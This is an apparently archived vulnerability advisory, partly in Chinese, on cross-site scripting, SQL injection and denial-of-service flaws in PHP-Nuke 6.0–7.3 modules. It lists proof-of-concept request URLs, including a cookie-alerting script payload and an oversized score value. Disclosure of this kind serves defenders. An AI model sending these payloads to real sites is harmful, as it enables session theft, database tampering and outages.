https://www.exploit-db.com/exploits/24193
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-815

PHP-Nuke6.0到7.3版本的Reviews模块存在漏洞。远程攻击者可以借助一个超出范围的超大score参数导致服务拒绝（CPU和内存消耗）。

source: http://www.securityfocus.com/bid/10524/info
   
PHP-Nuke is prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application:
   
PHP-Nuke is prone to multiple cross-site scripting vulnerabilities. These issues affect the 'Faq', 'Encyclopedia' and 'Reviews' modules.
   
These cross-site scripting issues could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If a user follows the malicious link, the attacker-supplied code executes in the Web browser of the victim computer.
   
PHP-Nuke is prone to an SQL Injection Vulnerability. Again the issue is due to a failure of the application to properly sanitize user-supplied input. The problem presents itself when SQL syntax is passed through the a parameter of the 'Reviews' module.
   
As a result of this issue an attacker could modify the logic and structure of database queries.
   
Finally a remote denial of service vulnerability is reported to exist in the score subsystem of the 'Review' module of PHP-Nuke, it is reported that a large number supplied as a value for a parameter passed to the 'Reviews' module will deny service to legitimate PHP-Nuke users. 

http://www.example.com/nuke73/modules.php?name=Reviews&rop=savecomment&id=1&uname=f00bar&score=999999999999999999999999 







http://www.example.com/nuke73/modules.php?name=FAQ&myfaq=yes&id_cat=1&categories=[xss code here]
http://www.example.com/nuke73/modules.php?name=Encyclopedia&op=terms&eid=1&ltr=[xss code here]
http://www.example.com/nuke73/modules.php?name=Encyclopedia&file=search&eid=[xss code here]
http://www.example.com/nuke73/modules.php?name=Encyclopedia&file=search&query=f00bar&eid=[xss code here]
http://www.example.com/nuke73/modules.php?name=Encyclopedia&op=content&tid=774&page=2&query=[xss code here]
http://www.example.com/nuke73/modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&url_title=foobar&url=[xss code here]
http://www.example.com/nuke73/modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&cover=[xss code here]
http://www.example.com/nuke73/modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&rlanguage=[xss code here]
http://www.example.com/nuke73/modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&hits=[xss code here]
http://www.example.com/nuke73/modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&[email protected]&reviewer=[xss code here]
http://www.example.com/nuke72/modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&email=f00@bar.org&text=f00%253c/textarea>%253cscript>alert%2528document.cookie);%253
c/script>bar
http://www.example.com/nuke73/modules.php?name=Reviews&rop=savecomment&uname=[xss code here]&id=8&score=9
http://www.example.com/nuke73/modules.php?name=Reviews&rop=Q&order=[sql injection code here]
http://www.example.com/nuke73/modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&[email protected]&reviewer=f00&score=9999

来源:XF
名称:phpnuke-reviews-dos(16409)
链接:http://xforce.iss.net/xforce/xfdb/16409
来源:BID
名称:10524
链接:http://www.securityfocus.com/bid/10524
来源:BUGTRAQ
名称:20040611[waraxe-2004-SA#032-MultiplesecurityflawsinPhpNuke6.x-7.3]
链接:http://www.securityfocus.com/archive/1/365865
来源:OSVDB
名称:7003
链接:http://www.osvdb.org/7003
来源:SECUNIA
名称:11852
链接:http://secunia.com/advisories/11852
来源:OSVDB
名称:7002
链接:http://www.osvdb.org/7002
来源:FULLDISC
名称:20040611[waraxe-2004-SA#032-MultiplesecurityflawsinPhpNuke6.x-7.3]
链接:http://archives.neohapsis.com/archives/fulldisclosure/2004-06/0310.html